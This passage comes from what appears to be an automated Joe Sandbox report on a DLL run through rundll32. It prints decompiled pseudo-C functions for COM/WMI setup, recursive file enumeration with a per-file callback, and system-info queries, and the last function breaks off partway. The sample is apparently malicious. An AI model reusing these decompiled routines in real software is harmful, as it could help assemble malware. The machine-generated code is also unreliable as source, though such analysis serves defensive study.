                                                                                                                                                                          • Instruction Fuzzy Hash: C3B01274680310AAF7100B604CC6B0135905744B03F300111F305581D0C6F120809508
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                          			E1000B56F(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                          				signed int* _t36;
                                                                                                                                                                          				signed int* _t39;
                                                                                                                                                                          
                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                          				_t36 = _a8;
                                                                                                                                                                          				_t28 = _t36[1];
                                                                                                                                                                          				if(_t28 != 0) {
                                                                                                                                                                          					_t39 = _t36[2];
                                                                                                                                                                          					do {
                                                                                                                                                                          						_a8 = _a8 & 0x00000000;
                                                                                                                                                                          						if(_t39[2] > 0) {
                                                                                                                                                                          							_t31 = _t39[3];
                                                                                                                                                                          							_t22 = _a4 + 0x24;
                                                                                                                                                                          							_v12 = _a4 + 0x24;
                                                                                                                                                                          							_v8 = _t39[3];
                                                                                                                                                                          							while(E1000C3F3(_t22,  *_t31) != 0) {
                                                                                                                                                                          								_t26 = _a8 + 1;
                                                                                                                                                                          								_t31 = _v8 + 4;
                                                                                                                                                                          								_a8 = _t26;
                                                                                                                                                                          								_t22 = _v12;
                                                                                                                                                                          								_v8 = _v8 + 4;
                                                                                                                                                                          								if(_t26 < _t39[2]) {
                                                                                                                                                                          									continue;
                                                                                                                                                                          								} else {
                                                                                                                                                                          								}
                                                                                                                                                                          								goto L8;
                                                                                                                                                                          							}
                                                                                                                                                                          							 *_t36 =  *_t36 |  *_t39;
                                                                                                                                                                          						}
                                                                                                                                                                          						L8:
                                                                                                                                                                          						_t39 =  &(_t39[4]);
                                                                                                                                                                          						_t28 = _t28 - 1;
                                                                                                                                                                          					} while (_t28 != 0);
                                                                                                                                                                          				}
                                                                                                                                                                          				Sleep(0xa);
                                                                                                                                                                          				return 1;
                                                                                                                                                                          			}









                                                                                                                                                                          0x1000b572
                                                                                                                                                                          0x1000b573
                                                                                                                                                                          0x1000b576
                                                                                                                                                                          0x1000b579
                                                                                                                                                                          0x1000b57e
                                                                                                                                                                          0x1000b581
                                                                                                                                                                          0x1000b584
                                                                                                                                                                          0x1000b584
                                                                                                                                                                          0x1000b58c
                                                                                                                                                                          0x1000b591
                                                                                                                                                                          0x1000b594
                                                                                                                                                                          0x1000b597
                                                                                                                                                                          0x1000b59a
                                                                                                                                                                          0x1000b59d
                                                                                                                                                                          0x1000b5b0
                                                                                                                                                                          0x1000b5b1
                                                                                                                                                                          0x1000b5b4
                                                                                                                                                                          0x1000b5ba
                                                                                                                                                                          0x1000b5bd
                                                                                                                                                                          0x1000b5c0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000b5c2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000b5c0
                                                                                                                                                                          0x1000b5c6
                                                                                                                                                                          0x1000b5c6
                                                                                                                                                                          0x1000b5c8
                                                                                                                                                                          0x1000b5c8
                                                                                                                                                                          0x1000b5cb
                                                                                                                                                                          0x1000b5cb
                                                                                                                                                                          0x1000b5d0
                                                                                                                                                                          0x1000b5d8
                                                                                                                                                                          0x1000b5e4

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNELBASE(0000000A), ref: 1000B5D8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                          • Opcode ID: 8d7f6698e92f291931e67ca9405abd4c5ee523d558af10fe8d23cec2e9bea250
                                                                                                                                                                          • Instruction ID: 8d11abeebc2aa343c0c0e72f51ee83e32999685b087293867dd598be26712cdf
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d7f6698e92f291931e67ca9405abd4c5ee523d558af10fe8d23cec2e9bea250
                                                                                                                                                                          • Instruction Fuzzy Hash: 59115E31A00B05AFEB00CF99C884B59B7E4EF08361F1084A9E859E7344C670E941CB40
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                          			E1000D2F7(void* __ecx) {
                                                                                                                                                                          				char _v8;
                                                                                                                                                                          				void* _v12;
                                                                                                                                                                          				char* _t15;
                                                                                                                                                                          				intOrPtr* _t16;
                                                                                                                                                                          				void* _t21;
                                                                                                                                                                          				intOrPtr* _t23;
                                                                                                                                                                          				intOrPtr* _t24;
                                                                                                                                                                          				intOrPtr* _t25;
                                                                                                                                                                          				void* _t30;
                                                                                                                                                                          				void* _t33;
                                                                                                                                                                          
                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                          				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                          				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                          				_t15 =  &_v12;
                                                                                                                                                                          				__imp__CoCreateInstance(0x1001d848, 0, 1, 0x1001d858, _t15);
                                                                                                                                                                          				if(_t15 < 0) {
                                                                                                                                                                          					L5:
                                                                                                                                                                          					_t23 = _v8;
                                                                                                                                                                          					if(_t23 != 0) {
                                                                                                                                                                          						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                          					}
                                                                                                                                                                          					_t24 = _v12;
                                                                                                                                                                          					if(_t24 != 0) {
                                                                                                                                                                          						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                          					}
                                                                                                                                                                          					_t16 = 0;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					__imp__#2(__ecx);
                                                                                                                                                                          					_t25 = _v12;
                                                                                                                                                                          					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                          					if(_t21 < 0) {
                                                                                                                                                                          						goto L5;
                                                                                                                                                                          					} else {
                                                                                                                                                                          						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                          						if(_t21 < 0) {
                                                                                                                                                                          							goto L5;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							_t16 = E100091E7(8);
                                                                                                                                                                          							if(_t16 == 0) {
                                                                                                                                                                          								goto L5;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                          								 *_t16 = _v8;
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          					}
                                                                                                                                                                          				}
                                                                                                                                                                          				return _t16;
                                                                                                                                                                          			}













                                                                                                                                                                          0x1000d304
                                                                                                                                                                          0x1000d307
                                                                                                                                                                          0x1000d30a
                                                                                                                                                                          0x1000d31b
                                                                                                                                                                          0x1000d321
                                                                                                                                                                          0x1000d332
                                                                                                                                                                          0x1000d33a
                                                                                                                                                                          0x1000d38b
                                                                                                                                                                          0x1000d38b
                                                                                                                                                                          0x1000d390
                                                                                                                                                                          0x1000d395
                                                                                                                                                                          0x1000d395
                                                                                                                                                                          0x1000d398
                                                                                                                                                                          0x1000d39d
                                                                                                                                                                          0x1000d3a2
                                                                                                                                                                          0x1000d3a2
                                                                                                                                                                          0x1000d3a5
                                                                                                                                                                          0x1000d33c
                                                                                                                                                                          0x1000d33d
                                                                                                                                                                          0x1000d343
                                                                                                                                                                          0x1000d354
                                                                                                                                                                          0x1000d359
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000d35b
                                                                                                                                                                          0x1000d368
                                                                                                                                                                          0x1000d370
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000d372
                                                                                                                                                                          0x1000d374
                                                                                                                                                                          0x1000d37c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000d37e
                                                                                                                                                                          0x1000d381
                                                                                                                                                                          0x1000d387
                                                                                                                                                                          0x1000d387
                                                                                                                                                                          0x1000d37c
                                                                                                                                                                          0x1000d370
                                                                                                                                                                          0x1000d359
                                                                                                                                                                          0x1000d3aa

                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D30A
                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D31B
                                                                                                                                                                          • CoCreateInstance.OLE32(1001D848,00000000,00000001,1001D858,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D332
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1000D33D
                                                                                                                                                                          • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D368
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Initialize$AllocBlanketCreateInstanceProxySecurityString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3531828250-0
                                                                                                                                                                          • Opcode ID: 1b73c657c68c961315636518ff4f579f70757a2e44550ced84fe791c63f005e9
                                                                                                                                                                          • Instruction ID: ce2d2dd4c4ff7f207a7cbb150afae4e575ecdd36406f0dbb136e095dd0923906
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b73c657c68c961315636518ff4f579f70757a2e44550ced84fe791c63f005e9
                                                                                                                                                                          • Instruction Fuzzy Hash: 8D21D570600255BBEB24AB66CC9DE5FBFBCEFC7B51F11415DB501A6290CB709A40DA31
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                          			E10009E70(void* __ecx, void* __fp0, intOrPtr _a16) {
                                                                                                                                                                          				char _v12;
                                                                                                                                                                          				WCHAR* _v16;
                                                                                                                                                                          				struct _WIN32_FIND_DATAW _v608;
                                                                                                                                                                          				WCHAR* _t24;
                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                          				intOrPtr _t41;
                                                                                                                                                                          				void* _t45;
                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                          				void* _t48;
                                                                                                                                                                          				intOrPtr _t54;
                                                                                                                                                                          				void* _t59;
                                                                                                                                                                          				char _t60;
                                                                                                                                                                          				void* _t61;
                                                                                                                                                                          				void* _t62;
                                                                                                                                                                          				void* _t63;
                                                                                                                                                                          				void* _t75;
                                                                                                                                                                          
                                                                                                                                                                          				_t75 = __fp0;
                                                                                                                                                                          				_push(0);
                                                                                                                                                                          				_t48 = __ecx;
                                                                                                                                                                          				_push(L"\\*");
                                                                                                                                                                          				_t24 = E100099EC(__ecx);
                                                                                                                                                                          				_t63 = _t62 + 0xc;
                                                                                                                                                                          				_v16 = _t24;
                                                                                                                                                                          				if(_t24 == 0) {
                                                                                                                                                                          					return _t24;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t59 = FindFirstFileW(_t24,  &_v608);
                                                                                                                                                                          				if(_t59 == 0xffffffff) {
                                                                                                                                                                          					L14:
                                                                                                                                                                          					return E10009203( &_v16, 0xfffffffe);
                                                                                                                                                                          				} else {
                                                                                                                                                                          					goto L2;
                                                                                                                                                                          				}
                                                                                                                                                                          				do {
                                                                                                                                                                          					L2:
                                                                                                                                                                          					if(E10009E48( &(_v608.cFileName)) != 0) {
                                                                                                                                                                          						goto L12;
                                                                                                                                                                          					}
                                                                                                                                                                          					if((_v608.dwFileAttributes & 0x00000010) != 0) {
                                                                                                                                                                          						L10:
                                                                                                                                                                          						_push(0);
                                                                                                                                                                          						_push( &(_v608.cFileName));
                                                                                                                                                                          						_push("\\");
                                                                                                                                                                          						_t60 = E100099EC(_t48);
                                                                                                                                                                          						_t63 = _t63 + 0x10;
                                                                                                                                                                          						_v12 = _t60;
                                                                                                                                                                          						if(_t60 != 0) {
                                                                                                                                                                          							_t54 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          							 *((intOrPtr*)(_t54 + 0xc4))(1);
                                                                                                                                                                          							_push(1);
                                                                                                                                                                          							_push(1);
                                                                                                                                                                          							_push(0);
                                                                                                                                                                          							E10009E70(_t60, _t75, 1, 5, E10010B2A, _a16);
                                                                                                                                                                          							_t63 = _t63 + 0x1c;
                                                                                                                                                                          							E10009203( &_v12, 0xfffffffe);
                                                                                                                                                                          						}
                                                                                                                                                                          						goto L12;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t61 = 0;
                                                                                                                                                                          					do {
                                                                                                                                                                          						_push( *((intOrPtr*)(_t61 + 0x100210d0)));
                                                                                                                                                                          						_push( &(_v608.cFileName));
                                                                                                                                                                          						_t41 =  *0x10020fe0; // 0x110fbe0
                                                                                                                                                                          						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
                                                                                                                                                                          							goto L8;
                                                                                                                                                                          						}
                                                                                                                                                                          						_t45 = E10010B2A(_t75, _t48,  &_v608, _a16);
                                                                                                                                                                          						_t63 = _t63 + 0xc;
                                                                                                                                                                          						if(_t45 == 0) {
                                                                                                                                                                          							break;
                                                                                                                                                                          						}
                                                                                                                                                                          						_t46 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          						 *((intOrPtr*)(_t46 + 0xc4))(1);
                                                                                                                                                                          						L8:
                                                                                                                                                                          						_t61 = _t61 + 4;
                                                                                                                                                                          					} while (_t61 < 4);
                                                                                                                                                                          					if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                          						goto L12;
                                                                                                                                                                          					}
                                                                                                                                                                          					goto L10;
                                                                                                                                                                          					L12:
                                                                                                                                                                          				} while (FindNextFileW(_t59,  &_v608) != 0);
                                                                                                                                                                          				_t31 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          				 *((intOrPtr*)(_t31 + 0x84))(_t59);
                                                                                                                                                                          				goto L14;
                                                                                                                                                                          			}



















                                                                                                                                                                          0x10009e70
                                                                                                                                                                          0x10009e7c
                                                                                                                                                                          0x10009e7e
                                                                                                                                                                          0x10009e80
                                                                                                                                                                          0x10009e86
                                                                                                                                                                          0x10009e8b
                                                                                                                                                                          0x10009e8e
                                                                                                                                                                          0x10009e93
                                                                                                                                                                          0x10009faf
                                                                                                                                                                          0x10009faf
                                                                                                                                                                          0x10009ea7
                                                                                                                                                                          0x10009eac
                                                                                                                                                                          0x10009f9e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009eb2
                                                                                                                                                                          0x10009eb2
                                                                                                                                                                          0x10009ebf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009ecd
                                                                                                                                                                          0x10009f20
                                                                                                                                                                          0x10009f20
                                                                                                                                                                          0x10009f28
                                                                                                                                                                          0x10009f29
                                                                                                                                                                          0x10009f34
                                                                                                                                                                          0x10009f36
                                                                                                                                                                          0x10009f39
                                                                                                                                                                          0x10009f3e
                                                                                                                                                                          0x10009f40
                                                                                                                                                                          0x10009f48
                                                                                                                                                                          0x10009f4e
                                                                                                                                                                          0x10009f50
                                                                                                                                                                          0x10009f52
                                                                                                                                                                          0x10009f67
                                                                                                                                                                          0x10009f6c
                                                                                                                                                                          0x10009f75
                                                                                                                                                                          0x10009f7b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009f3e
                                                                                                                                                                          0x10009ecf
                                                                                                                                                                          0x10009ed1
                                                                                                                                                                          0x10009ed1
                                                                                                                                                                          0x10009edd
                                                                                                                                                                          0x10009ede
                                                                                                                                                                          0x10009ee8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009ef5
                                                                                                                                                                          0x10009efa
                                                                                                                                                                          0x10009eff
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009f01
                                                                                                                                                                          0x10009f08
                                                                                                                                                                          0x10009f0e
                                                                                                                                                                          0x10009f0e
                                                                                                                                                                          0x10009f11
                                                                                                                                                                          0x10009f1e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009f7c
                                                                                                                                                                          0x10009f8a
                                                                                                                                                                          0x10009f92
                                                                                                                                                                          0x10009f98
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 10009EA1
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 10009F84
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1690352074-0
                                                                                                                                                                          • Opcode ID: ae9c37ce122c04667dac7d1167ad8c9b28cb489da10c75ada123c9762d696c28
                                                                                                                                                                          • Instruction ID: 555cadeb5f071304b440e3dadb6de0eb34a7c2fec7698278087d2bad13c9927d
                                                                                                                                                                          • Opcode Fuzzy Hash: ae9c37ce122c04667dac7d1167ad8c9b28cb489da10c75ada123c9762d696c28
                                                                                                                                                                          • Instruction Fuzzy Hash: 51310831A042166FFB10DBA4CD89FAA77A9EB04790F100074F919D71D6EB71ED40CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1000B967(void* __ecx) {
                                                                                                                                                                          				struct _SYSTEM_INFO _v40;
                                                                                                                                                                          				void* _t5;
                                                                                                                                                                          
                                                                                                                                                                          				if(__ecx == 0) {
                                                                                                                                                                          					GetSystemInfo( &_v40);
                                                                                                                                                                          					return _v40.dwOemId & 0x0000ffff;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					_t5 = 9;
                                                                                                                                                                          					return _t5;
                                                                                                                                                                          				}
                                                                                                                                                                          			}





                                                                                                                                                                          0x1000b96f
                                                                                                                                                                          0x1000b97a
                                                                                                                                                                          0x1000b985
                                                                                                                                                                          0x1000b971
                                                                                                                                                                          0x1000b973
                                                                                                                                                                          0x1000b975
                                                                                                                                                                          0x1000b975

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,1000BE52,?,?,00000000), ref: 1000B97A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                          • Opcode ID: 767d4d8b320d70d3546e6dadcfa05ce5210f431b328cf14a8369f91b60a3ea89
                                                                                                                                                                          • Instruction ID: 0ea09056568cddae72f6db05d408285a1f01a126f74f09a3d9f776612afef0c3
                                                                                                                                                                          • Opcode Fuzzy Hash: 767d4d8b320d70d3546e6dadcfa05ce5210f431b328cf14a8369f91b60a3ea89
                                                                                                                                                                          • Instruction Fuzzy Hash: ECC0C031A0020D46DF00DFB167466EE33FC4B082C8F100050EE03F00C5E960DD804370
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                          			E1000D7CB(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                          				char _v24;
                                                                                                                                                                          				void* _v28;
                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                          				char _v36;
                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                          				char _v48;
                                                                                                                                                                          				char _v52;
                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                          				signed int _v60;
                                                                                                                                                                          				char* _v72;
                                                                                                                                                                          				signed short _v80;
                                                                                                                                                                          				signed int _v84;
                                                                                                                                                                          				char _v88;
                                                                                                                                                                          				char _v92;
                                                                                                                                                                          				char _v96;
                                                                                                                                                                          				intOrPtr _v100;
                                                                                                                                                                          				char _v104;
                                                                                                                                                                          				char _v616;
                                                                                                                                                                          				intOrPtr* _t159;
                                                                                                                                                                          				char _t165;
                                                                                                                                                                          				signed int _t166;
                                                                                                                                                                          				signed int _t173;
                                                                                                                                                                          				signed int _t178;
                                                                                                                                                                          				signed int _t186;
                                                                                                                                                                          				intOrPtr* _t187;
                                                                                                                                                                          				signed int _t188;
                                                                                                                                                                          				signed int _t192;
                                                                                                                                                                          				intOrPtr* _t193;
                                                                                                                                                                          				intOrPtr _t200;
                                                                                                                                                                          				intOrPtr* _t205;
                                                                                                                                                                          				signed int _t207;
                                                                                                                                                                          				signed int _t209;
                                                                                                                                                                          				intOrPtr* _t210;
                                                                                                                                                                          				intOrPtr _t212;
                                                                                                                                                                          				intOrPtr* _t213;
                                                                                                                                                                          				signed int _t214;
                                                                                                                                                                          				char _t217;
                                                                                                                                                                          				signed int _t218;
                                                                                                                                                                          				signed int _t219;
                                                                                                                                                                          				signed int _t230;
                                                                                                                                                                          				signed int _t235;
                                                                                                                                                                          				signed int _t242;
                                                                                                                                                                          				signed int _t243;
                                                                                                                                                                          				signed int _t244;
                                                                                                                                                                          				signed int _t245;
                                                                                                                                                                          				intOrPtr* _t247;
                                                                                                                                                                          				intOrPtr* _t251;
                                                                                                                                                                          				signed int _t252;
                                                                                                                                                                          				intOrPtr* _t253;
                                                                                                                                                                          				void* _t255;
                                                                                                                                                                          				intOrPtr* _t261;
                                                                                                                                                                          				signed int _t262;
                                                                                                                                                                          				signed int _t283;
                                                                                                                                                                          				signed int _t289;
                                                                                                                                                                          				char* _t298;
                                                                                                                                                                          				void* _t320;
                                                                                                                                                                          				signed int _t322;
                                                                                                                                                                          				intOrPtr* _t323;
                                                                                                                                                                          				intOrPtr _t324;
                                                                                                                                                                          				signed int _t327;
                                                                                                                                                                          				intOrPtr* _t328;
                                                                                                                                                                          				intOrPtr* _t329;
                                                                                                                                                                          
                                                                                                                                                                          				_v32 = _v32 & 0x00000000;
                                                                                                                                                                          				_v60 = _v60 & 0x00000000;
                                                                                                                                                                          				_v56 = __edx;
                                                                                                                                                                          				_v100 = __ecx;
                                                                                                                                                                          				_t159 = E1000D2F7(__ecx);
                                                                                                                                                                          				_t251 = _t159;
                                                                                                                                                                          				_v104 = _t251;
                                                                                                                                                                          				if(_t251 == 0) {
                                                                                                                                                                          					return _t159;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t320 = E100091E7(0x10);
                                                                                                                                                                          				_v36 = _t320;
                                                                                                                                                                          				_pop(_t255);
                                                                                                                                                                          				if(_t320 == 0) {
                                                                                                                                                                          					L53:
                                                                                                                                                                          					E10009203( &_v60, 0xfffffffe);
                                                                                                                                                                          					E1000D3AB( &_v104);
                                                                                                                                                                          					return _t320;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t165 = E100091B2(_t255, 0x101c);
                                                                                                                                                                          				 *_t328 = 0xa18;
                                                                                                                                                                          				_v52 = _t165;
                                                                                                                                                                          				_t166 = E100091B2(_t255);
                                                                                                                                                                          				_push(0);
                                                                                                                                                                          				_push(_v56);
                                                                                                                                                                          				_v20 = _t166;
                                                                                                                                                                          				_push(_t166);
                                                                                                                                                                          				_push(_a4);
                                                                                                                                                                          				_t322 = E100099EC(_t165);
                                                                                                                                                                          				_v60 = _t322;
                                                                                                                                                                          				E10009E2E( &_v52);
                                                                                                                                                                          				E10009E2E( &_v20);
                                                                                                                                                                          				_t329 = _t328 + 0x20;
                                                                                                                                                                          				if(_t322 != 0) {
                                                                                                                                                                          					_t323 = __imp__#2;
                                                                                                                                                                          					_v40 =  *_t323(_t322);
                                                                                                                                                                          					_t173 = E100091B2(_t255, 0x10b4);
                                                                                                                                                                          					_v20 = _t173;
                                                                                                                                                                          					_v52 =  *_t323(_t173);
                                                                                                                                                                          					E10009E2E( &_v20);
                                                                                                                                                                          					_t324 = _v40;
                                                                                                                                                                          					_t261 =  *_t251;
                                                                                                                                                                          					_t252 = 0;
                                                                                                                                                                          					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                                                                                                                          					__eflags = _t178;
                                                                                                                                                                          					if(_t178 != 0) {
                                                                                                                                                                          						L52:
                                                                                                                                                                          						__imp__#6(_t324);
                                                                                                                                                                          						__imp__#6(_v52);
                                                                                                                                                                          						goto L53;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t262 = _v32;
                                                                                                                                                                          					_v28 = 0;
                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                          					__eflags = _t262;
                                                                                                                                                                          					if(_t262 == 0) {
                                                                                                                                                                          						L49:
                                                                                                                                                                          						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                                                                                                                          						__eflags = _t252;
                                                                                                                                                                          						if(_t252 == 0) {
                                                                                                                                                                          							E10009203( &_v36, 0);
                                                                                                                                                                          							_t320 = _v36;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							 *(_t320 + 8) = _t252;
                                                                                                                                                                          							 *_t320 = E1000984F(_v100);
                                                                                                                                                                          							 *((intOrPtr*)(_t320 + 4)) = E1000984F(_v56);
                                                                                                                                                                          						}
                                                                                                                                                                          						goto L52;
                                                                                                                                                                          					} else {
                                                                                                                                                                          						goto L6;
                                                                                                                                                                          					}
                                                                                                                                                                          					while(1) {
                                                                                                                                                                          						L6:
                                                                                                                                                                          						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                                                                                                                          						__eflags = _t186;
                                                                                                                                                                          						if(_t186 != 0) {
                                                                                                                                                                          							break;
                                                                                                                                                                          						}
                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                          						_v48 = 0;
                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                          						__eflags = _v84;
                                                                                                                                                                          						if(_v84 == 0) {
                                                                                                                                                                          							break;
                                                                                                                                                                          						}
                                                                                                                                                                          						_t187 = _v28;
